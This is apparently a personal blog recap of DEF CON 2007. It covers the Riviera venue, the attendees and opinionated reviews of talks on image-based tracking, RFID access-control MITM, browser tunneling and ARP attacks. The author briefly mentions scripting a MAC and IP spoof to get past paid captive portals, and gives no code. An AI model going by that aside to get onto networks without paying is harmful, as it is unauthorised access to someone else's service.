This year's defcon was similar to last years. At the Riviera, black and white
ball were split across two night, a few amazingly lame talks were given, some
cool talks, and as always Dan Kaminsky's talk was entertaining.
I'm no Vegas expert, but the Riviera casino/hotel is the *worst* casino in
town. I had many conversations with fellow attendees reminiscing about how much
we missed the Alexis Park. Finding parties at the Alexis was cake - walk
outside, follow the people and noise. Parties were everywhere. There were also
3 outdoor pool areas which collected people, booze, and music each night. The
only downside to the Alexsis Park was that its conference areas were too
small and too few. This downside was mitigated by three-channel closed-circuit
TV channels broadcast live and viewable on any hotel room's tv. Watch the talks
from your room? Awesome. For parties and community, the Alexis Park ruled. For
more plentiful conference space, the Riviera is better. It's a shame we
(Defcon) outgrew the Alexis Park.
The Riviera is a giant, old, dirty resort casino. The rooms are not great, the
casino smells bad, and the food is horrible. Basically, I can't say much nice
about the place other than it does have large quantities of conference space.
The casino staff were generally nice folks, but I don't gamble so I didn't
interact with them much. Their concierge desk is horrible. Every time I asked
where I might find a particular place (pizza, sushi, flare bar, etc) that was not inside
the Riviera, they had no answers.
I went to my usual (read: small) number of talks this year. I missed a few that
were titled in such a way as to disinterest me that I later found out covered
some cool material. Bruce Potter's talk was overflowing with people, so some of
us had to leave - sad. If you have his talk on video, please send me a url :)
There were thousands of scene whores at defcon this year. We were drowning in
them. So much so, perhaps, that some 0x90
folks made these
shirts which showed up during the I/O Active party (which was awesome, btw).
I also found that there were so many super paranoid people at Defcon. Mostly
scene whores who really have no idea what a computer is or what security is
about. Too many evesdropped conversations where people said "I'm not turning on
wireless! I have too much important stuff on my laptop that I can't allow to
get out!" Are they that worried about being exploited? Probably. Do they really
have shit worth protecting on their laptops? Probably not. One of these people
was a student at UCSD and he talked shit about his friends' computer knowledge
constantly while his friends were supposedly writing tetris for the defcon
If you have a clue and have something on your laptop worth protecting so much
so you physically turn off wifi, then you don't bring it to defcon. Clearly
these people haven't got a clue and are just whoring up the scene. [*]
[*] One exception is reporters and other press types, who I won't require to
have security or computer clue. Of the people I overheard freaking out about
wireless, all of them were normal attendees, not press.
I flew into SFO on Monday morning. Wendy was due to land in a few hours, so I
sat at the airport so we could go home together. After signing on for wireless,
I remembered a project I've been meaning to do for a while - masquerade as a
known-valid MAC and IP combination to bypass captive portals. It's easy to do,
but I wanted it automated. Now I have a script. I'll post more on this later,
but the typical configuration of "captive-portal authentication == your mac+ip
is allowed through the firewall" is not a good way to run your pay-for
One final notable event is that we took a limo ride to In-n-Out again this year.
I went to more than the talks listed below, but they weren't worth commenting
on or I don't remember them.
- Mike Schrenk - "The Executable Image Exploit"
- Before going, I thought this talk was going to be on a new twist to recent
image library exploits. It wasn't. His <sarcasm>amazing</sarcasm>
content covered something known for years, that
(wikipedia calls them deep links), could be used to track users or reveal
information by tracking the referrer url or *gasp* setting a cookie!
Mike also talked about using php to serve images and that you can set cookies
using php, but myspace filters images ending with '.php' apparently. His
workaround was to tell apache to process .jpg files as php, and he presented
this as if he was breaking some kind of new ground and that this was the
coolest thing ever: "You can fool apache into running php code on jpegs!"
Clearly by "fool" we really mean "configure the same way you do with .php
except you put .jpg". Who's fooling who? ;)
Around this time I was realizing that by "executable image" he really meant
that he was executing php code on his own server whenever someone requested an
image, again, from his server. This would have been a good presentation for
1998, perhaps, not 2007.
- Zac Franken - Biometrics and Token access control systems
This talk was great. My knowledge of rfid, biometrics, and other physical
access token systems is limited and this talk gave me lots of good
information. Furthermore, Zac gave a live demo that worked well. The tool
he made, which he called "Gecko", was really neat. Practical and cheap.
A short summary is that he was performing MITM on physical access systems. As
it turned out, most centralized security systems (biometrics, rfid locks,
etc) all talk the same protocol to the central authorization server. Gecko
simply man-in-the-middles these transactions. MITM is not new, but this
application was pretty neat and the small size of his prototype made this
kind of physical hacking practical.
He gave a live demo, which went smoothly, using a few RFID badges. Being
minimalist, the interface to his Gecko tool once it was installed was via
standard badges. He had made special "control" badges that the Gecko tool
understood to be commands such as a replay command, which would replay a
previously-intercepted, known-valid, badge read to the server.
He also talked about future versions of Gecko which might include bluetooth
or GSM, which would let you access the reader device from far away. Very neat.
- Dan Kaminsky - Design Reviewing the Web
Oh Dan. I love you. I went to Dan's talk last
year and saw the same attributes this year. His talk covered some
interesting things, but he's so full of himself. Watching him talk makes it
seem like he is the security industry. One person only, not the thousands
of security professionals and underground hackers around the world. Just
He did demo his hack of SLIRP over the web browser (flash+http) which was
pretty neat, though. Tunneling traffic through the browser into your
network. He also ported his dotplot thing from last year to winamp for fun
and profit, which wasn't very impressive but made for a good screensaver.
- Jesse D'Aguanno - Arp Reloaded
Jesse's description of this talk was that it would "build on the previous
research in this field and introduce new, more reliable attacks against the
ARP protocol which are much less identifiable and able to protect against."
He covered exactly what is already known, and nothing more. Like Mike's
talk above, this talk would belong in 1995, or earlier, not 2007. Who's
reviewing these talk submissions?
It is almost like Jesse lives in a black box. Not only did he cover
decades-old exploits, he reinvented the wheel. There are many many tools that will
let you easily craft packets and dump them on the network. Netwox, nemesis,
and scapy are just 3 I can name off the top of my head. Ignoring the years
of developing packet crafting tools, he wrote his own crappy tool to dump
crafted arp packets onto the network which he calls "arpcraft" which does
exactly the same thing as netwox, nemesis, and scapy, in more or less the
same amount of typing. Weak sauce. I call shenanigans.
This lame presentation is from the same person who made headlines about his
blackberry hackery last year. Was this blackberry research really his own
work, or is he just a front for someone elses work?
He also demoed a remote shell tool using arp. Seems useless to me since arp
only goes over layer 2 and won't leave the local layer 2 network. Wxs joked that you would better off
beating the owner of your exploit target machine with a bat to wrest the
password out of him than using a remote shell via arp, since layer 2 means
your target almost guaranteed to be physically close.
- David Gustin - Hardware Hacking for Software Geeks
The title of this talk grabbed me immediately. The content was great!
Unfortunately, early in the talk, the speakers mentioned that sparkfun.com was a great howto site.
I spent the rest of the talk reading tutorials on that website. Oops.